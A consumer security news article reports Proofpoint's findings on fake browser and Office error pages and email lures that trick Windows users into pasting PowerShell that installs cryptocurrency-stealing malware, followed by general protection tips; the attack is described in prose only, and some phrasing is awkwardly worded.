.elementor-panel-state-loading{ display: none; }



Fake software fixes fuel money-stealing malware threat

Online protection company Proofpoint has warned that new advanced malware masquerading as Google Chrome and Microsoft could steal money from Windows device owners. Several cybercriminal groups are using the malware, including some known for sending spam emails that infect computers. Malware or Ransomware.

The malware poses as fake updates for internet browsers like Chrome to trick users into downloading harmful code that, once on their computers, gives hackers access to cryptocurrency, sensitive files, and personal information.

Get security alerts, expert tips – Sign up for KURT’s newsletter – The Cyber ​​Guy Report here

Microsoft Laptop (Microsoft) (Kurt “Cyberguy” Knutson)

How does fake update malware work?

Proof Points Large-scale distribution of the malware was spotted this month, but online protection companies believe the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word and OneDrive errors to trick users into downloading the harmful code. These errors prompt visitors to click a button to copy a PowerShell “fix” to their clipboard and then paste it into a run dialog or PowerShell prompt to run it.

“While the attack chain requires significant user interaction to be successful, social engineering can be clever, simultaneously presenting a real problem and what appears to be a solution, encouraging users to take action without considering the risks,” Proofpoint warns.

When the PowerShell script is executed, it checks if the device is a valid target and then downloads an additional payload. These steps include clearing the DNS cache, deleting the clipboard contents, displaying a fake message, and downloading another remote PowerShell script.

Fake software fixes fuel money-stealing malware threats

ClickFix Error Messages (Proofpoint) (Kurt “Cyberguy” Knutson)


Cryptocurrency theft

This second script checks if it is running on a virtual machine before downloading an information stealer. Once everything is ready, the hacker has access to the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.

Alternative attack method: Email decoy

Proofpoint notes that bad actors are also using another method called “email lures” to install malicious software. Typically, emails that appear work- or corporate-related contain HTML files that resemble Microsoft Word. These emails prompt users to install the “Word Online” extension to properly view the document.

Similar to the method above, users are prompted to open PowerShell and copy the malicious code. According to Proofpoint, this deceptive “campaign” has been widespread. The company said, “The campaign included more than 100,000 messages, targeting thousands of organizations around the world.”

Fake software fixes fuel money-stealing malware threats

HTML attachment with instructions to copy and paste PowerShell that leads to the installation of malware (Proofpoint) (Kurt “Cyberguy” Knutson)

Keep your voicemails safe from prying eyes in your neighborhood with these easy tips

5 ways to protect yourself from malicious software

Fake Chrome and Microsoft Word malware creates a sense of urgency, leading users to click on links and unknowingly put their devices at risk. There are steps you can take to protect yourself from such malware:

1) Deploy powerful antivirus software: The best way to protect yourself from clicking on malicious links that could install malware that could access your personal information is to install antivirus protection on all your devices, which will also warn you about phishing emails and ransomware scams. We’ve handpicked the winners of the Best Antivirus Protection of 2024 Windows, Mac, Android and iOS devices.

2) Use a VPN: To protect you from being tracked and to identify your potential location on websites you visit, consider using a VPN. Many sites can read your IP address and, depending on your privacy settings, may be able to see the city you’re communicating from. A VPN disguise your IP address to show a different location. For the best VPN software, check out my expert reviews of the best VPNs for browsing the web privately on your phone. Windows, Mac, Android and iOS devices.

3) Monitor your account: Regularly review your bank statements, credit card statements, and other financial accounts for unauthorized transactions. If you notice any suspicious transactions, report them to your bank or credit card company immediately.

4) Issue a fraud alert: Contact one of the big three credit reporting agencies (Equifax, Experian, or TransUnion) and ask them to place a fraud alert on your credit file. This will make it harder for identity thieves to open new accounts in your name without verification.

5) Enable 2-factor authentication: To enable Two-factor certification Whenever possible, they will require a second form of verification, such as a code sent to your mobile phone, in addition to your password, providing an extra layer of security.

How to remove your personal information from the internet

Important points about the cart

Hackers are cleverly designing malware and tricking people into installing it on their devices. This malware specifically targets Windows users, and Windows devices seem to be more susceptible to this type of attack. Recently, Microsoft Flaw in Windows Wi-Fi driver could allow hackers to take control of your PC All you need to do is connect to the same Wi-Fi network. Be careful when browsing online or connecting to public Wi-Fi.

How do you verify the authenticity of software before you download it and install it on your device? Email us. Cyberguy.com/Contact Us.

If you want to hear more of my tech tips and security alerts, subscribe to the free CyberGuy Report newsletter at the link below. Cyberguy.com/Newsletter.

Have a question for Kurt or tell us the story you’d like to see featured?.

Follow Kurt on his social channels

Answers to the CyberGuy’s most frequently asked questions:

Copyright 2024 CyberGuy.com. All Rights Reserved.